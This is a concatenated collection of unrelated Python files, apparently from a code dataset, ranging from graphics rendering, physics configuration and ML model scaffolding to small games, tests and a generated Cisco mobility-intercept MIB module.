int tx = int(v_texcoord.x * size + 0.5);
int ty = int(v_texcoord.y * size + 0.5);
out_address = ty * size + tx;
}
''',
layout=[
{
'name': 'Common',
'binding': 0,
},
],
resources=[
{
'type': 'uniform_buffer',
'binding': 0,
'buffer': uniform_buffer,
},
],
framebuffer=[temp_color, temp_depth],
topology='triangles',
cull_face='back',
vertex_buffers=zengl.bind(vertex_buffer, '3f 3f 2f', 0, -1, 2),
vertex_count=vertex_buffer.size // zengl.calcsize('3f 3f 2f'),
)
bar = Bar('Progress', fill='-', suffix='%(percent)d%%', max=samples)
ao = np.zeros(size * size, 'f4')
for i in range(samples):
phi = np.pi * (3.0 - np.sqrt(5.0))
y = 1.0 - (i / (samples - 1.0)) * 2.0
x = np.cos(phi * i) * np.sqrt(1.0 - y * y)
z = np.sin(phi * i) * np.sqrt(1.0 - y * y)
camera = zengl.camera((x * 5.0, y * 5.0, z * 5.0), (0.0, 0.0, 0.0), aspect=1.0, fov=45.0)
uniform_buffer.write(camera)
temp_color.clear()
temp_depth.clear()
texcoord_pipeline.render()
t = np.frombuffer(temp_color.read(), 'i4').reshape((size, size))
ao[np.unique(t[t >= 0])] += 1.0
bar.next()
ao -= ao.min()
ao /= ao.max()
ao = gaussian(ao, 1.0)
texture = ctx.image((size, size), 'r32float', ao)
Image.fromarray((ao.reshape(size, size) * 255.0).astype('u1'), 'L').save('generated-ao-map.png')
render_pipeline = ctx.pipeline(
vertex_shader='''
#version 330
layout (std140) uniform Common {
mat4 mvp;
};
layout (location = 0) in vec3 in_vertex;
layout (location = 1) in vec3 in_normal;
layout (location = 2) in vec2 in_texcoord;
out vec3 v_normal;
out vec2 v_texcoord;
void main() {
gl_Position = mvp * vec4(in_vertex, 1.0);
v_normal = in_normal;
v_texcoord = in_texcoord;
}
''',
fragment_shader='''
#version 330
uniform sampler2D Texture;
in vec2 v_texcoord;
layout (location = 0) out vec4 out_color;
void main() {
float lum = texture(Texture, v_texcoord).r;
vec3 color = vec3(1.0, 1.0, 1.0);
out_color = vec4(color * lum, 1.0);
}
''',
layout=[
{
'name': 'Common',
'binding': 0,
},
{
'name': 'Texture',
'binding': 0,
},
],
resources=[
{
'type': 'uniform_buffer',
'binding': 0,
'buffer': uniform_buffer,
},
{
'type': 'sampler',
'binding': 0,
'image': texture,
'wrap_x': 'clamp_to_edge',
'wrap_y': 'clamp_to_edge',
},
],
framebuffer=[image, depth],
topology='triangles',
cull_face='back',
vertex_buffers=zengl.bind(vertex_buffer, '3f 3f 2f', 0, -1, 2),
vertex_count=vertex_buffer.size // zengl.calcsize('3f 3f 2f'),
)
while window.update():
x, y = np.cos(window.time * 0.5) * 5.0, np.sin(window.time * 0.5) * 5.0
camera = zengl.camera((x, y, 1.0), (0.0, 0.0, 0.0), aspect=1.0, fov=45.0)
uniform_buffer.write(camera)
image.clear()
depth.clear()
render_pipeline.render()
image.blit()
| python |
import FWCore.ParameterSet.Config as cms
process = cms.Process("Demo")
##process.load("AuxCode.CheckTkCollection.Run123151_RECO_cff")
process.load("FWCore.MessageService.MessageLogger_cfi")
MessageLogger = cms.Service("MessageLogger",
cout = cms.untracked.PSet(
threshold = cms.untracked.string('WARNING')
),
destinations = cms.untracked.vstring('cout')
)
process.MessageLogger.cerr.FwkReport.reportEvery = 1000
process.load("Configuration.StandardSequences.FrontierConditions_GlobalTag_cff")
process.GlobalTag.globaltag = 'GR09_R_34X_V2::All'
process.source = cms.Source("PoolSource",
fileNames = cms.untracked.vstring('rfio:///?svcClass=cmscafuser&path=/castor/cern.ch/cms/store/user/emiglior/ALCARECO/08Jan10/TkAlMinBias_123615.root','rfio:///?svcClass=cmscafuser&path=/castor/cern.ch/cms/store/user/emiglior/ALCARECO/08Jan10/TkAlMinBias_124009.root','rfio:///?svcClass=cmscafuser&path=/castor/cern.ch/cms/store/user/emiglior/ALCARECO/08Jan10/TkAlMinBias_124020.root','rfio:///?svcClass=cmscafuser&path=/castor/cern.ch/cms/store/user/emiglior/ALCARECO/08Jan10/TkAlMinBias_124022.root')
#
#'rfio:///?svcClass=cmscafuser&path=/castor/cern.ch/cms/store/user/emiglior/ALCARECO/08Jan10/TkAlMinBias_124024.root','rfio:///?svcClass=cmscafuser&path=/castor/cern.ch/cms/store/user/emiglior/ALCARECO/08Jan10/TkAlMinBias_124030.root','rfio:///?svcClass=cmscafuser&path=/castor/cern.ch/cms/store/user/emiglior/ALCARECO/08Jan10/TkAlMinBias_124230.root'
#,'rfio:///?svcClass=cmscafuser&path=/castor/cern.ch/cms/store/user/emiglior/ALCARECO/08Jan10/TkAlMinBias_124120.root' #2.36TeV run
)
process.maxEvents = cms.untracked.PSet( input = cms.untracked.int32(-1) )
process.LhcTrackAnalyzer = cms.EDAnalyzer("LhcTrackAnalyzer",
# TrackCollectionTag = cms.InputTag("generalTracks"),
TrackCollectionTag = cms.InputTag("ALCARECOTkAlMinBias"),
PVtxCollectionTag = cms.InputTag("offlinePrimaryVertices"),
OutputFileName = cms.string("AnalyzerOutput_1.root"),
Debug = cms.bool(False)
)
process.p = cms.Path(process.LhcTrackAnalyzer)
| python |
import numpy as np
# a = np.array([[1, 2], [3, 4]])
# a = np.array([[[1, 2], [3, 4]], [[5,6],[7,8]]])
a = np.array([[[0, 1], [2, 3]], [[4,5],[6,7]]])
print(a.sum(axis = 0))
print(a.sum(axis = 1))
| python |
import numpy as np
import abc
import os
from typing import NamedTuple, Optional, List, Dict, Tuple, Iterable
from representation.code2vec.common import common
from representation.code2vec.vocabularies import Code2VecVocabs, VocabType
from representation.code2vec.config import Config
class ModelEvaluationResults(NamedTuple):
topk_acc: float
subtoken_precision: float
subtoken_recall: float
subtoken_f1: float
loss: Optional[float] = None
def __str__(self):
res_str = 'topk_acc: {topk_acc}, precision: {precision}, recall: {recall}, F1: {f1}'.format(
topk_acc=self.topk_acc,
precision=self.subtoken_precision,
recall=self.subtoken_recall,
f1=self.subtoken_f1)
if self.loss is not None:
res_str = ('loss: {}, '.format(self.loss)) + res_str
return res_str
class ModelPredictionResults(NamedTuple):
original_name: str
topk_predicted_words: np.ndarray
topk_predicted_words_scores: np.ndarray
attention_per_context: Dict[Tuple[str, str, str], float]
code_vector: Optional[np.ndarray] = None
class Code2VecModelBase(abc.ABC):
def __init__(self, config: Config):
self.config = config
self.config.verify()
self._log_creating_model()
if not config.RELEASE:
self._init_num_of_examples()
self._log_model_configuration()
self.vocabs = Code2VecVocabs(config)
self.vocabs.target_vocab.get_index_to_word_lookup_table() # just to initialize it (if not already initialized)
self._load_or_create_inner_model()
self._initialize()
def _log_creating_model(self):
self.log('')
self.log('')
self.log('---------------------------------------------------------------------')
self.log('---------------------------------------------------------------------')
self.log('---------------------- Creating code2vec model ----------------------')
self.log('---------------------------------------------------------------------')
self.log('---------------------------------------------------------------------')
def _log_model_configuration(self):
self.log('---------------------------------------------------------------------')
self.log('----------------- Configuration - Hyper Parameters ------------------')
longest_param_name_len = max(len(param_name) for param_name, _ in self.config)
for param_name, param_val in self.config:
self.log('{name: <{name_len}}{val}'.format(
name=param_name, val=param_val, name_len=longest_param_name_len+2))
self.log('---------------------------------------------------------------------')
@property
def logger(self):
return self.config.get_logger()
def log(self, msg):
self.logger.info(msg)
def _init_num_of_examples(self):
self.log('Checking number of examples ...')
if self.config.is_training:
self.config.NUM_TRAIN_EXAMPLES = self._get_num_of_examples_for_dataset(self.config.train_data_path)
self.log(' Number of train examples: {}'.format(self.config.NUM_TRAIN_EXAMPLES))
if self.config.is_testing:
self.config.NUM_TEST_EXAMPLES = self._get_num_of_examples_for_dataset(self.config.TEST_DATA_PATH)
self.log(' Number of test examples: {}'.format(self.config.NUM_TEST_EXAMPLES))
@staticmethod
def _get_num_of_examples_for_dataset(dataset_path: str) -> int:
dataset_num_examples_file_path = dataset_path + '.num_examples'
if os.path.isfile(dataset_num_examples_file_path):
with open(dataset_num_examples_file_path, 'r') as file:
num_examples_in_dataset = int(file.readline())
else:
num_examples_in_dataset = common.count_lines_in_file(dataset_path)
with open(dataset_num_examples_file_path, 'w') as file:
file.write(str(num_examples_in_dataset))
return num_examples_in_dataset
def load_or_build(self):
self.vocabs = Code2VecVocabs(self.config)
self._load_or_create_inner_model()
def save(self, model_save_path=None):
if model_save_path is None:
model_save_path = self.config.MODEL_SAVE_PATH
model_save_dir = '/'.join(model_save_path.split('/')[:-1])
if not os.path.isdir(model_save_dir):
os.makedirs(model_save_dir, exist_ok=True)
self.vocabs.save(self.config.get_vocabularies_path_from_model_path(model_save_path))
self._save_inner_model(model_save_path)
def _write_code_vectors(self, file, code_vectors):
for vec in code_vectors:
file.write(' '.join(map(str, vec)) + '\n')
def _get_attention_weight_per_context(
self, path_source_strings: Iterable[str], path_strings: Iterable[str], path_target_strings: Iterable[str],
attention_weights: Iterable[float]) -> Dict[Tuple[str, str, str], float]:
attention_weights = np.squeeze(attention_weights, axis=-1) # (max_contexts, )
attention_per_context: Dict[Tuple[str, str, str], float] = {}
# shape of path_source_strings, path_strings, path_target_strings, attention_weights is (max_contexts, )
# iterate over contexts
for path_source, path, path_target, weight in \
zip(path_source_strings, path_strings, path_target_strings, attention_weights):
string_context_triplet = (common.binary_to_string(path_source),
common.binary_to_string(path),
common.binary_to_string(path_target))
attention_per_context[string_context_triplet] = weight
return attention_per_context
def close_session(self):
# can be overridden by the implementation model class.
# default implementation just does nothing.
pass
@abc.abstractmethod
def train(self):
...
@abc.abstractmethod
def evaluate(self) -> Optional[ModelEvaluationResults]:
...
@abc.abstractmethod
def predict(self, predict_data_lines: Iterable[str]) -> List[ModelPredictionResults]:
...
@abc.abstractmethod
def _save_inner_model(self, path):
...
def _load_or_create_inner_model(self):
if self.config.is_loading:
self._load_inner_model()
else:
self._create_inner_model()
@abc.abstractmethod
def _load_inner_model(self):
...
def _create_inner_model(self):
# can be overridden by the implementation model class.
# default implementation just does nothing.
pass
def _initialize(self):
# can be overridden by the implementation model class.
# default implementation just does nothing.
pass
@abc.abstractmethod
def _get_vocab_embedding_as_np_array(self, vocab_type: VocabType) -> np.ndarray:
...
def save_word2vec_format(self, dest_save_path: str, vocab_type: VocabType):
if vocab_type not in VocabType:
raise ValueError('`vocab_type` should be `VocabType.Token`, `VocabType.Target` or `VocabType.Path`.')
vocab_embedding_matrix = self._get_vocab_embedding_as_np_array(vocab_type)
index_to_word = self.vocabs.get(vocab_type).index_to_word
with open(dest_save_path, 'w') as words_file:
common.save_word2vec_file(words_file, index_to_word, vocab_embedding_matrix)
| python |
from tkinter import *
from tkinter import filedialog
from tkinter.constants import *
import platform
import os
import re
class Window(Frame):
desktop_path = os.path.expanduser("~/Desktop")
def __init__(self, master=None):
Frame.__init__(self, master)
self.master = master
self.file = None
self.init_window()
def init_window(self):
self.master.title("GUI")
self.pack()
# create Menu instance
menu = Menu(self.master)
self.master.config(menu=menu)
self.init_file_menu(menu)
self.init_edit_menu(menu)
# main text field
self.main_text_field = Text(self.master)
self.main_text_field.config()
self.main_text_field.pack(fill=BOTH, expand=1)
def init_file_menu(self, menu_instance):
# add upper_menu (open, save etc)
file_menu = Menu(menu_instance)
file_menu.add_command(label="Open", command=self.open_file)
file_menu.add_command(label="Save", command=self.save_file)
file_menu.add_command(label="Exit", command=self.quit_client)
menu_instance.add_cascade(label="File", menu=file_menu)
def init_edit_menu(self, menu_instance):
# add Edit menu
edit = Menu(menu_instance)
edit.add_command(label="Undo", command=self.undo_changes)
edit.add_command(label="Redo", command=self.redo_changes)
menu_instance.add_cascade(label="Edit", menu=edit)
def open_file(self):
print("Open file!")
self.file = filedialog.askopenfilename(initialdir = self.desktop_path, title = "Select file", filetypes = (("TXT files","*.txt"),("all files","*.*")))
if(self.file is not None):
self.main_text_field.insert(END, self.read_file(self.file))
def read_file(self, filename):
f = open(filename)
text = f.read()
return text
def save_file(self):
print("Save file!")
def undo_changes(self):
print("Undo changes!")
def redo_changes(self):
print("Redo changes!")
def quit_client(self):
exit()
root = Tk()
root.grid_columnconfigure(0, weight=1)
if(platform.system() != 'Linux'):
root.attributes("-fullscreen", True)
else:
root.attributes("-zoomed", True)
app = Window(root)
root.mainloop() | python |
import heroku3
from config import Config
client = heroku3.from_key(Config.HEROKU_API_KEY)
class HerokuHelper:
def __init__(self,appName,apiKey):
self.API_KEY = apiKey
self.APP_NAME = appName
self.client = self.getClient()
self.app = self.client.apps()[self.APP_NAME]
def getClient(self):
return heroku3.from_key(self.API_KEY)
def getAccount(self):
return self.client.account()
def getLog(self):
return self.app.get_log()
def addEnvVar(self,key,value):
self.app.config()[key] = value
def restart(self):
return self.app.restart()
| python |
from django.apps import AppConfig
class LoverRecorderConfig(AppConfig):
name = 'lover_recorder'
| python |
import numpy
SCENARIO_VERSION = '2020a' # default scenario version for writing scenario files
SUPPORTED_COMMONROAD_VERSIONS = {'2018b', '2020a'} # supported version for reading scenario files
TWO_PI = 2.0 * numpy.pi
| python |
import random
print("Hi, please enter your name")
name = input() #input 1
secretNumber = random.randint(1, 50)
print(name + ' Guess the number between 1 & 50', '\nYou have 4 tries')
attempts = 0
for attempts in range(1, 5):
print('Take a guess')
while True:
try:
guess = int(input())
break
except ValueError:
print('Please Enter a Number')
continue
if guess < secretNumber:
print('Too Low, you have ' + str(4 - attempts) + ' attempts remaining')
elif guess > secretNumber:
print('Too High, you have ' + str(4 - attempts) + ' attempts remaining')
else:
break
if guess == secretNumber:
print('Well Done ' + name)
else:
print('Too Many Attempts ' + str(attempts) + ', It was ' + str(secretNumber))
play = False
# add something extra | python |
class PrettyEnv(RenderBasic):
def __init__( ):
def getBestEnv
def getEnvList
| python |
# Copyright 2020 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""__init__"""
from .equal import equal_manual, equal_auto
from .greater_equal import greater_equal_manual, greater_equal_auto
from .less_equal import less_equal_manual, less_equal_auto
from .cast import cast_manual, cast_auto
from .tile import tile_manual, tile_auto
from .one_hot import one_hot_manual, one_hot_auto
from .sqrt import sqrt_manual, sqrt_auto
from .sub import sub_manual, sub_auto
from .add import add_manual, add_auto
from .addn import addn_manual, addn_auto
from .rsqrt import rsqrt_manual, rsqrt_auto
from .expand_dims import expand_dims_manual, expand_dims_auto
from .batch_matmul import batch_matmul_manual, batch_matmul_auto
from .mul import mul_manual, mul_auto
from .exp import exp_manual, exp_auto
from .divide import divide_manual, divide_auto
from .maximum import maximum_manual, maximum_auto
from .minimum import minimum_manual, minimum_auto
from .reshape import reshape_manual, reshape_auto
from .trans_data import trans_data_manual, trans_data_auto
from .log import log_manual, log_auto
from .pow import pow_manual, pow_auto
from .reduce_sum import reduce_sum_manual, reduce_sum_auto
from .abs import abs_manual, abs_auto
from .neg import neg_manual, neg_auto
from .round import round_manual, round_auto
from .select import select_manual, select_auto
from .reciprocal import reciprocal_manual, reciprocal_auto
from .reduce_min import reduce_min_manual, reduce_min_auto
from .reduce_max import reduce_max_manual, reduce_max_auto
from .pad import pad_manual, pad_auto
from .resize import resize_manual, resize_auto
from .resize_nearest_neighbor_grad import resize_nearest_neighbor_grad_manual, resize_nearest_neighbor_grad_auto
from .fused_pad import fused_pad_manual, fused_pad_auto
from .fused_bn_reduce import fused_bn_reduce_manual, fused_bn_reduce_auto
from .fused_bn_update import fused_bn_update_manual, fused_bn_update_auto
from .fused_bn_follow_relu import fused_bn_follow_relu_manual, fused_bn_follow_relu_auto
from .fused_bn_follow_relu_avgpool import fused_bn_follow_relu_avgpool_manual, fused_bn_follow_relu_avgpool_auto
from .fused_bn_double_follow_relu import fused_bn_double_follow_relu_manual, fused_bn_double_follow_relu_auto
from .fused_bn_reduce_grad import fused_bn_reduce_grad_manual, fused_bn_reduce_grad_auto
from .fused_relu_grad_bn_reduce_grad import fused_relu_grad_bn_reduce_grad_manual, fused_relu_grad_bn_reduce_grad_auto
from .fused_relu_grad_bn_double_reduce_grad import fused_relu_grad_bn_double_reduce_grad_manual, fused_relu_grad_bn_double_reduce_grad_auto
from .fused_l2loss_grad import fused_l2loss_grad_manual, fused_l2loss_grad_auto
from .fused_is_finite import fused_is_finite_manual, fused_is_finite_auto
from .fused_relu_grad_bn_update_grad import fused_relu_grad_bn_update_grad_manual, fused_relu_grad_bn_update_grad_auto
from .fused_relu_grad_bn_double_update_grad import fused_relu_grad_bn_double_update_grad_manual, fused_relu_grad_bn_double_update_grad_auto
from .fused_relu_grad import fused_relu_grad_manual, fused_relu_grad_auto
from .fused_bn_update_grad import fused_bn_update_grad_manual, fused_bn_update_grad_auto
from .fused_mul_div_rsqrt_mul_isfinite_red import fused_mul_div_rsqrt_mul_isfinite_red_manual, fused_mul_div_rsqrt_mul_isfinite_red_auto
| python |
# ----------------------------------------------------------------------------
# CLASSES: nightly
#
# Test Case: globalids.py
#
# Tests: libsim - connecting to simulation and retrieving data from it.
# mesh - 3D unstructured mesh.
# global node and cell ids
# unstructured ghost cell generation from global ids
#
# Programmer: Brad Whitlock
# Date: Tue Jun 17 16:32:51 PDT 2014
#
# Modifications:
#
# ----------------------------------------------------------------------------
def step(sim):
sim.consolecommand("step")
# Read from stderr to look for the echoed command. Sync.
keepGoing = True
while keepGoing:
buf = sim.p.stderr.readline()
print buf
if "Command step" in buf:
keepGoing = False
def set_the_view():
v = GetView3D()
v.viewNormal = (-0.707418, 0.404282, 0.579755)
v.focus = (0.5, 0.5, 0.5)
v.viewUp = (0.294715, 0.914272, -0.27794)
v.viewAngle = 30
v.parallelScale = 0.866025
v.nearPlane = -1.73205
v.farPlane = 1.73205
v.imagePan = (0, 0.0589478)
v.imageZoom = 1.0963
v.perspective = 1
v.eyeAngle = 2
v.centerOfRotationSet = 0
v.centerOfRotation = (0.5, 0.5, 0.5)
v.axis3DScaleFlag = 0
v.axis3DScales = (1, 1, 1)
v.shear = (0, 0, 1)
v.windowValid = 1
SetView3D(v)
def set_the_view2():
v = GetView3D()
v.viewNormal = (-0.542717, -0.70433, 0.457578)
v.focus = (0.5, 0.5, 0.5)
v.viewUp = (0.252732, 0.3826, 0.888675)
v.viewAngle = 30
v.parallelScale = 0.722842
v.nearPlane = -1.44568
v.farPlane = 1.44568
v.imagePan = (-0.00135472, 0.013532)
v.imageZoom = 1.12868
v.perspective = 1
v.eyeAngle = 2
v.centerOfRotationSet = 0
v.centerOfRotation = (0.5, 0.5, 0.5)
v.axis3DScaleFlag = 0
v.axis3DScales = (1, 1, 1)
v.shear = (0, 0, 1)
v.windowValid = 1
SetView3D(v)
def add_time(times):
Query("Time")
t2 = times + str(GetQueryOutputValue()) + "\n"
return t2
def start_time():
return add_time("Times:\n")
def test0(sim):
TestSection("Topologically 3D meshes in 3D")
DefineScalarExpression("gnid", "global_nodeid(mesh)")
DefineScalarExpression("gzid", "global_zoneid(mesh)")
DefineScalarExpression("nid", "nodeid(mesh)")
AddPlot("Pseudocolor", "nid")
DrawPlots()
set_the_view()
Test("globalids02")
ChangeActivePlotsVar("gzid")
DrawPlots()
Test("globalids03")
ChangeActivePlotsVar("gnid")
DrawPlots()
Test("globalids04")
DeleteAllPlots()
AddPlot("Subset", "Domains")
DrawPlots()
Test("globalids05")
# Make sure that the plot is hollow
s = SubsetAttributes(1)
s_clear = SubsetAttributes(1)
s_clear.opacity = 0.25
s_clear.colorType = s_clear.ColorBySingleColor
s_clear.singleColor = (200,200,200,255)
SetPlotOptions(s_clear)
DrawPlots()
Test("globalids06")
# Advance some steps and make sure that the plot
# stays transparent. We're changing the size of the
# domains at each time step and thus the global ids.
times = start_time()
idx = 7
for i in xrange(3):
# Advance some steps. This should make the plots update.
nsteps = 5
for j in xrange(nsteps):
step(sim)
DrawPlots()
times = add_time(times)
SetPlotOptions(s)
Test("globalids%02d" % idx)
idx = idx + 1
SetPlotOptions(s_clear)
Test("globalids%02d" % idx)
idx = idx + 1
TestText("globalids%02d" % idx, times)
idx = idx + 1
DeleteAllPlots()
def hideplot(id):
pl = GetPlotList()
if pl.GetPlots(id).hiddenFlag == 0:
SetActivePlots(id)
HideActivePlots()
def showplot(id):
pl = GetPlotList()
if pl.GetPlots(id).hiddenFlag == 1:
SetActivePlots(id)
HideActivePlots()
def test1(sim):
TestSection("Topologically 2D meshes in 3D")
DefineScalarExpression("gnid2d", "global_nodeid(surface)")
DefineScalarExpression("gzid2d", "global_zoneid(surface)")
DefineScalarExpression("nid2d", "nodeid(surface)")
AddPlot("FilledBoundary", "surfacemat")
fb = FilledBoundaryAttributes(1)
fb.colorType = fb.ColorBySingleColor
fb.singleColor = (0,0,0,255)
fb.wireframe = 1
fb.lineWidth = 3
SetPlotOptions(fb)
AddPlot("Subset", "Domains(surface)")
AddPlot("Pseudocolor", "nid2d")
DrawPlots()
set_the_view2()
idx = 0
times = start_time()
ntests = 4
for i in xrange(3):
ids = [idx+j for j in range(ntests)]
# Show the Subset plot
showplot(1)
hideplot(2)
Test("globalids_1_%02d" % ids[0])
# Show the Pseudocolor plot
hideplot(1)
showplot(2)
ChangeActivePlotsVar("nid2d")
Test("globalids_1_%02d" % ids[1])
ChangeActivePlotsVar("gnid2d")
Test("globalids_1_%02d" % ids[2])
ChangeActivePlotsVar("gzid2d")
Test("globalids_1_%02d" % ids[3])
SetActivePlots(0)
times = add_time(times)
# Take a step.
showplot(1)
step(sim)
idx = idx + ntests
TestText("globalids_1_%02d" % idx, times)
DeleteAllPlots()
def main():
# Create our simulation object.
sim = TestSimulation("globalids", "globalids.sim2")
sim.addargument("-echo")
# Test that we can start and connect to the simulation.
started, connected = TestSimStartAndConnect("globalids00", sim)
# Perform our tests.
if connected:
# Make sure the metadata is right.
TestSimMetaData("globalids01", sim.metadata())
test0(sim)
test1(sim)
# Close down the simulation.
if started:
sim.endsim()
main()
Exit()
| python |
import sys
import typing
def equation(a: int, b: int, c: int) -> typing.Tuple[int, int]:
x1 = (-1*b + (b ** 2 - 4 * a * c) ** 0.5) / (2 * a)
x2 = (-1*b - (b ** 2 - 4 * a * c) ** 0.5) / (2 * a)
return int(x1), int(x2)
def test() -> None:
assert equation(1, -3, -4) == (4, -1)
assert equation(13, 236, -396) == (1, -19)
assert equation(23, -116, 96) == (4, 1)
if __name__ == '__main__':
test()
args: typing.List[int] = []
if len(sys.argv) >= 4:
[print(x) for x in equation(int(sys.argv[1]),
int(sys.argv[2]),
int(sys.argv[3]))]
| python |
#
# PySNMP MIB module CISCO-MOBILITY-TAP-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/CISCO-MOBILITY-TAP-MIB
# Produced by pysmi-0.3.4 at Wed May 1 12:07:50 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
OctetString, Integer, ObjectIdentifier = mibBuilder.importSymbols("ASN1", "OctetString", "Integer", "ObjectIdentifier")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
SingleValueConstraint, ValueRangeConstraint, ConstraintsIntersection, ConstraintsUnion, ValueSizeConstraint = mibBuilder.importSymbols("ASN1-REFINEMENT", "SingleValueConstraint", "ValueRangeConstraint", "ConstraintsIntersection", "ConstraintsUnion", "ValueSizeConstraint")
ciscoMgmt, = mibBuilder.importSymbols("CISCO-SMI", "ciscoMgmt")
cTap2StreamIndex, cTap2MediationContentId = mibBuilder.importSymbols("CISCO-TAP2-MIB", "cTap2StreamIndex", "cTap2MediationContentId")
ModuleCompliance, ObjectGroup, NotificationGroup = mibBuilder.importSymbols("SNMPv2-CONF", "ModuleCompliance", "ObjectGroup", "NotificationGroup")
Unsigned32, iso, TimeTicks, ModuleIdentity, Counter32, IpAddress, NotificationType, ObjectIdentity, MibIdentifier, Bits, MibScalar, MibTable, MibTableRow, MibTableColumn, Counter64, Integer32, Gauge32 = mibBuilder.importSymbols("SNMPv2-SMI", "Unsigned32", "iso", "TimeTicks", "ModuleIdentity", "Counter32", "IpAddress", "NotificationType", "ObjectIdentity", "MibIdentifier", "Bits", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "Counter64", "Integer32", "Gauge32")
TruthValue, TextualConvention, StorageType, DisplayString, RowStatus = mibBuilder.importSymbols("SNMPv2-TC", "TruthValue", "TextualConvention", "StorageType", "DisplayString", "RowStatus")
ciscoMobilityTapMIB = ModuleIdentity((1, 3, 6, 1, 4, 1, 9, 9, 672))
ciscoMobilityTapMIB.setRevisions(('2010-06-16 00:00', '2010-04-15 00:00', '2008-08-05 00:00',))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
if mibBuilder.loadTexts: ciscoMobilityTapMIB.setRevisionsDescriptions(('Added a new textual convention: CmtapLawfulInterceptID. Added following three objects to cmtapStreamTable. cmtapStreamLIIdentifier. cmtapStreamLocationInfo. cmtapStreamInterceptType. Added the following new MODULE-COMPLIANCE. ciscoMobilityTapMIBComplianceRev01. Added the following new OBJECT-GROUP. ciscoMobilityTapStreamGroupSup1.', "Added enumeration 'servedMdn' for mtapStreamCapabilities object and CmtapSubscriberIDType.", 'Initial version of this MIB module.',))
if mibBuilder.loadTexts: ciscoMobilityTapMIB.setLastUpdated('201006160000Z')
if mibBuilder.loadTexts: ciscoMobilityTapMIB.setOrganization('Cisco Systems, Inc.')
if mibBuilder.loadTexts: ciscoMobilityTapMIB.setContactInfo('Cisco Systems Customer Service Postal:170 W. Tasman Drive San Jose, CA 95134 USA Tel:+1 800 553-NETS E-mail:[email protected]')
if mibBuilder.loadTexts: ciscoMobilityTapMIB.setDescription("This module manages Cisco's intercept feature for Mobility Gateway Products. This MIB is used along with CISCO-TAP2-MIB MIB to intercept Mobility Gateway traffic. CISCO-TAP2-MIB MIB along with specific filter MIBs like this MIB replace the CISCO-TAP-MIB MIB. To create a Mobility intercept, an entry cmtapStreamEntry is created which contains the filter details. An entry cTap2StreamEntry of CISCO-TAP2-MIB is created which is the common stream information for all kinds of intercepts and type of the specific stream is set to 'mobility' in this entry.")
ciscoMobilityTapMIBNotifs = MibIdentifier((1, 3, 6, 1, 4, 1, 9, 9, 672, 0))
ciscoMobilityTapMIBObjects = MibIdentifier((1, 3, 6, 1, 4, 1, 9, 9, 672, 1))
ciscoMobilityTapMIBConform = MibIdentifier((1, 3, 6, 1, 4, 1, 9, 9, 672, 2))
cmtapStreamGroup = MibIdentifier((1, 3, 6, 1, 4, 1, 9, 9, 672, 1, 1))
class CmtapLawfulInterceptID(TextualConvention, OctetString):
description = 'An octet string containing the Lawful Intercept Identifier (LIID)assigned to the intercepted target by a law enforcement agency defined by Communications Assistance for Law Enforcement Act (CALEA).'
status = 'current'
displayHint = '256a'
subtypeSpec = OctetString.subtypeSpec + ValueSizeConstraint(3, 256)
class CmtapSubscriberIDType(TextualConvention, Integer32):
description = "A value that represents the type of address that is used to identify a subscriber. The following types are currently supported: unknown: The Subscriber's identifier type is not known. msid: A Mobile Subscriber Identity (MSID). imsi: An International Mobile Subscriber Identity(IMSI) number. nai: A Network Access Identifier (NAI). esn: An Electronic Serial Number (ESN). servedMdn: Served Mdn(mobile directory number) is a vendor specific attribute. It is similar to the class IETF attribute. Refer to RFC 2865 for vendor specific attribute format. Example:dsg-mdn."
status = 'current'
subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6))
namedValues = NamedValues(("unknown", 1), ("msid", 2), ("imsi", 3), ("nai", 4), ("esn", 5), ("servedMdn", 6))
class CmtapSubscriberID(TextualConvention, OctetString):
description = "An octet string containing a subscriber's identification, preferably in human-readable form. A CmtapStreamSubscriberID value is always interpreted within the context of an CmtapStreamSubscriberIDType value. Every usage of the CmtapStreamSubscriberID textual convention is required to specify the identity that corresponds to a CmtapStreamSubscriberIDType object."
status = 'current'
displayHint = '256a'
subtypeSpec = OctetString.subtypeSpec + ValueSizeConstraint(3, 256)
cmtapStreamCapabilities = MibScalar((1, 3, 6, 1, 4, 1, 9, 9, 672, 1, 1, 1), Bits().clone(namedValues=NamedValues(("tapEnable", 0), ("interface", 1), ("calledSubscriberID", 2), ("nonvolatileStorage", 3), ("msid", 4), ("imsi", 5), ("nai", 6), ("esn", 7), ("servedMdn", 8)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: cmtapStreamCapabilities.setStatus('current')
if mibBuilder.loadTexts: cmtapStreamCapabilities.setDescription("This object indicates the Mobility Gateway intercept features that are implemented by this device and are manageable through this MIB. tapEnable: set if table entries with cTap2StreamInterceptEnable set to 'false' are used to pre-screen packets for intercept; otherwise these entries are ignored. interface: SNMP ifIndex Value may be used to select interception of all data crossing an interface or set of interfaces. nonvolatileStorage: The cmTapStreamTable supports the ability to store rows in nonvolatile memory. calledSubscriberID: The cmtapStreamCalledSubscriberID can be used to specify intercepts. Otherwise, this field is disabled. msid: A Mobile Subscriber Identity (MSID) can be used in the ID strings to specify intercepts. imsi: An International Mobile Subscriber Identity (IMSI) number can be used ID strings to specify intercepts. nai: A Network Access Identifier (NAI) can be used in the ID strings to specify intercepts. esn: An Electronic Serial Number (ESN) can be used in the ID strings to specify intercepts. servedMdn: Vendor specific attribute Served-Mobile Directory Number(MDN) can be used in the ID strings to specify intercepts.")
cmtapStreamTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 672, 1, 1, 2), )
if mibBuilder.loadTexts: cmtapStreamTable.setStatus('current')
